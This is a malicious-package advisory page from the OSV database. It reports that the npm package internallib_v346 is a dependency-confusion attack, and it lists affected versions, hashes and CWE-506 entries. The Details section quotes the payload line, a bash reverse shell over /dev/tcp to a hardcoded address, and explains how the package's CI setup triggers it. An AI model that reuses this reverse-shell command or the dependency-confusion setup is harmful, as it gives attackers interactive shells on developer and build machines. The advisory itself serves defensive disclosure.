MAL-2026-5613
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v346/MAL-2026-5613.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-5613
- Published
- 2026-06-11T07:19:48Z
- Modified
- 2026-06-12T16:46:41.774865817Z
- Summary
- Malicious code in internallib_v346 (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (16f3f2c0990e02417fdf7012e6531393e81f786bb16019d0efdb03c049817f90)
Package name targets an internal-only namespace and ships a reverse-shell payload. index.js line 5 unconditionally invokes
exec('/bin/bash -c "bash -i >& /dev/tcp/10.0.56.229/443 0>&1"')inside the first definition of the exportedcommandfunction, opening an interactive shell back to the hardcoded RFC1918 address 10.0.56.229 on port 443. A second assignment toexports.commandlater in the file overwrites the export, but the malicious statement is evaluated whenever the first function body is reached and is shipped verbatim in the published tarball. The package also declares a self-referential dependency oninternallib_v346: ^1.0.0and includes a.gitlab-ci.yml that runsnpm update --registry http://0.0.0.0:4873/followed bynode check.js, where check.js doesrequire("internallib_v346"). The naming and CI shape are characteristic of a Birsan-style dependency-confusion attack against an organization's internalinternallib_v346package: when a victim build resolves from the public registry instead of the internal Verdaccio mirror, the reverse-shell code lands in the developer or CI environment. - Database specific
{ "malicious-packages-origins": [ { "id": "IN-MAL-2026-005696", "import_time": "2026-06-11T07:49:42.089279362Z", "sha256": "16f3f2c0990e02417fdf7012e6531393e81f786bb16019d0efdb03c049817f90", "source": "amazon-inspector", "modified_time": "2026-06-11T07:19:48Z", "versions": [ "1.0.3" ] }, { "id": "IN-MAL-2026-005698", "versions": [ "1.1.0" ], "sha256": "ca0c0f264625c77a0695bd5e908a1e7f764bcaaa16d3e785167b0ab56965fdd4", "source": "amazon-inspector", "modified_time": "2026-06-11T07:19:50Z", "import_time": "2026-06-11T07:49:42.274607487Z" }, { "id": "IN-MAL-2026-005697", "import_time": "2026-06-11T07:49:42.171801317Z", "sha256": "a9cd3a304ca53f98e5e1598be0822c44c12d54d41e2ca72ae6d39c12a7332e14", "source": "amazon-inspector", "modified_time": "2026-06-11T07:19:49Z", "versions": [ "1.0.9" ] }, { "id": "IN-MAL-2026-005699", "import_time": "2026-06-11T07:49:42.389563885Z", "sha256": "b63d776e7932e5f411c572799269f05aaec305e2df00a9e6a635f50c60f49a25", "source": "amazon-inspector", "modified_time": "2026-06-11T07:19:52Z", "versions": [ "1.0.5" ] }, { "id": "IN-MAL-2026-005789", "versions": [ "1.1.1" ], "sha256": "b8244df25b60c5471ac12cc27ca7116899c12e3741c5a3477c8e1bf65b0c4434", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:22Z", "import_time": "2026-06-12T16:32:16.54285143Z" }, { "id": "IN-MAL-2026-005790", "versions": [ "1.1.2" ], "sha256": "00d56227ad7f3e5b9b0b9f8e04ce88fec70ed7e96a438a1c39f33ad86d203055", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:23Z", "import_time": "2026-06-12T16:32:16.577539407Z" } ] }- References
-
- https://www.npmjs.com/package/internallib_v346/v/1.0.3
- https://www.npmjs.com/package/internallib_v346/v/1.1.0
- https://www.npmjs.com/package/internallib_v346/v/1.0.9
- https://www.npmjs.com/package/internallib_v346/v/1.0.5
- https://www.npmjs.com/package/internallib_v346/v/1.1.1
- https://www.npmjs.com/package/internallib_v346/v/1.1.2
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / internallib_v346
Package
- Name
- internallib_v346
- View open source insights on deps.dev
- Purl
- pkg:npm/internallib_v346
Database specific
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
indicators
{
"evidence_files": [
{
"path": "index.js",
"sha256": "2e6d10be6c0aae2e7ac2ef2b8d2689e66cef888121d3ce018962d5cab7b2e3cb",
"tlsh": "54e0205a19fe1930a51570e06a0bf050794b59662224c161e46495a35f8100d51aa4ed"
},
{
"path": "package.json",
"sha256": "189a24406d5f4df85449f0abdb9965c181115162261711283ed1e21a8f9d3246",
"tlsh": "9cd02e200a225c3322c5036a2c79801372a09f2f008afc0863cb492c40cf2b39cfd30c"
}
],
"package_integrity": [
{
"filename": "internallib_v346-1.0.3.tgz",
"hashes": {
"sha512_sri": "sha512-UlnT7WsGHbNi8md2n7eCjVH/QYDw7HwM7x9Mgey5uZRwbVWxZRNQkdaSMoz7NO+0Re3W3ozqCULKtuAKNnAlew==",
"sha1": "aca560455bddec62ffe7b1f4ee7478d4ab614f47"
}
}
]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v346/MAL-2026-5613.json"